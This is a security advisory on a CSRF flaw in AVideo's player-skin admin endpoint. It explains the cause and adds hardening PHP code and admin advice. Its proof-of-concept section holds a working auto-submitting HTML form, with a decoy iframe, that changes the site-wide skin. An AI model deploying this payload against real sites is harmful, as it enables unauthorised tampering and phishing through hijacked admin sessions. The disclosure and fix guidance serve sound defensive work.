
[MEDIUM] Security Advisory: AVideo: CSRF on Player Skin Configuration via admin/playerUpdate.json.php (wwbn/avideo)

AVideo, an open-source video sharing platform, exposes a cross-site request forgery (CSRF) vulnerability in its admin panel. Attackers can trick authenticated admins into changing the site’s player skin configuration platform-wide by visiting a malicious webpage. Rated medium severity and classified as CWE-352, this flaw stems from missing CSRF token checks in admin/playerUpdate.json.php, combined with bypassed ORM protections and lax cookie settings.

The endpoint pulls the skin directly from POST data without validation: $pluginDO->skin = $_POST['skin']; (line 17). AVideo’s ORM normally enforces Referer/Origin checks for cross-origin writes, but developers explicitly call ignoreTableSecurityCheck() on the plugins table. This strips the last defense layer. Worse, session cookies use SameSite=None, so browsers send them in cross-origin POSTs automatically.

Vulnerability Mechanics

AVideo (also known as YouPHPTube) powers self-hosted video sites for creators avoiding Big Tech platforms. It handles uploads, streaming, and monetization, with over 10,000 GitHub stars and deployments worldwide. Admins customize the video player via plugins, including skins that control appearance across all videos.

Here, the attack exploits admin sessions. An attacker hosts a simple HTML page on their domain. When an admin visits—perhaps via phishing email or ad—the page fires a POST to /admin/playerUpdate.json.php with a new skin value. The browser attaches the session cookie, authenticating the request silently. No user interaction needed beyond loading the page.

Proof of Concept

Host this HTML on an attacker site:

<!DOCTYPE html>
<html>
<body>
<h1>CSRF Player Skin</h1>
<p>Loading video...</p>
<iframe src="https://target-site.com/v123" style="display:none;"></iframe>
<form id="csrf" action="https://target-site.com/admin/playerUpdate.json.php" method="POST" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="skin" value="attacker-skin-url" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

The iframe loads a video to keep the admin engaged. On visit, the form submits, overwriting the skin. Test on a vulnerable AVideo instance (pre-fix, versions up to latest as of advisory).

Why This Matters

Player skins dictate how every video renders for all users—thumbnails, controls, overlays. An attacker sets a malicious skin with broken CSS, phishing links, or malware redirects. Disruptions halt playback; defacements erode trust. In a multi-tenant setup, one admin slip affects thousands.

Broadly, CSRF persists in legacy PHP apps like AVideo due to incomplete mitigations. SameSite=None enables it, as browsers prioritize compatibility over security. ORM bypasses signal rushed development: plugins need flexibility, but security suffers. The medium rating is fair: exploitation requires an admin session and social engineering, not remote code execution. Still, the complete absence of mitigations on this endpoint amplifies the risk.

AVideo's 100k+ downloads and active community (forks like WWBN/AVideo) mean widespread exposure. Self-hosters often skip updates; this hit production sites until patched.

Fix and Prevention

Add CSRF validation early in admin/playerUpdate.json.php:

// Before line 17
if (!isGlobalTokenValid()) {
    die('{"error":"Invalid CSRF token"}');
}
$pluginDO->skin = $_POST['skin'];

Generate tokens via AVideo's session_start() and getToken(). Set cookies to SameSite=Strict or Lax. Re-enable ORM checks unless critical. Audit other ignoreTableSecurityCheck() calls—11 tables flagged in source.
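The fix above and the cookie advice that follows it, worked through as an added example (not AVideo's own code): a per-session token checked with hash_equals, an Origin/Referer check standing in for the ORM check that ignoreTableSecurityCheck() disabled, SameSite cookie parameters, and a whitelist on the skin value. It assumes session_start() has run and the caller has already verified the user is an admin; function names are hypothetical.

```php
<?php
// Added example, not AVideo's own code: a CSRF-hardened version of the
// skin update. Assumes session_start() has run and the caller has already
// verified the user is an admin; hypothetical function names throughout.

// Cookie hardening, to be called before session_start(): SameSite=Lax stops
// the browser attaching the session cookie to a cross-site POST.
function configureSessionCookie(): void {
    session_set_cookie_params(['secure' => true, 'httponly' => true, 'samesite' => 'Lax']);
}

// Per-session anti-CSRF token; echo it into every admin form as a hidden field.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time check; a missing or malformed token fails closed.
function csrfTokenIsValid($submitted): bool {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: the Origin/Referer check the ORM would have done had
// ignoreTableSecurityCheck() not disabled it. No header at all fails closed.
function originIsSameSite(string $expectedHost): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    return $origin !== '' && parse_url($origin, PHP_URL_HOST) === $expectedHost;
}

// The write itself: only a known skin name, never a raw value from POST.
function handlePlayerUpdate(array $post, array $allowedSkins, string $host): array {
    if (!originIsSameSite($host) || !csrfTokenIsValid($post['csrf_token'] ?? null)) {
        http_response_code(403);
        return ['error' => 'Invalid CSRF token or origin'];
    }
    $skin = $post['skin'] ?? '';
    if (!in_array($skin, $allowedSkins, true)) {
        http_response_code(400);
        return ['error' => 'Unknown skin'];
    }
    // $pluginDO->skin = $skin; $pluginDO->save();  (AVideo's ORM write goes here)
    return ['error' => false, 'skin' => $skin];
}
```

Render csrfToken() into the admin form through htmlspecialchars() as a hidden csrf_token field; in AVideo itself the getToken()/isGlobalTokenValid() pair mentioned above can take the place of the two token functions.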

Admins: Enable 2FA, restrict admin IPs, and monitor plugin changes. Update to the patched version released after the advisory (check the wwbn/avideo repo). Scan with tools like aisafe.io, which found this. In video platforms, UI tampering is a preview of worse to come: the next vulnerability could hit content or billing.
